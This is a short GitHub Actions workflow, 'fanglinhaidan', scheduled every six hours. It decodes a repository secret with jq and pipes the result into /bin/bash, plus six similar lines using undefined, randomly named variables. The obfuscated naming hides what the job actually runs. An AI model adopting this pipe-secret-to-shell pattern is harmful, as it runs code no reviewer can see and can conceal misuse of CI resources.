name: fanglinhaidan

on:
  workflow_dispatch:
  schedule:
    - cron: '7 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanglinhaidan
        env:
          hrmo276: ${{ secrets.hrmo276 }}
        run: |
          echo $hrmo276 | jq -r .zll8 | /bin/bash
          echo $vvpv707 | jq -r .pnf4 | /bin/bash
          echo $kztky5 | jq -r .hvcax76 | /bin/bash
          echo $o04 | jq -r .vsn4 | /bin/bash
          echo $h74 | jq -r .ef657 | /bin/bash
          echo $ph4 | jq -r .sgdg2 | /bin/bash
          echo $divv4 | jq -r .wy94 | /bin/bash

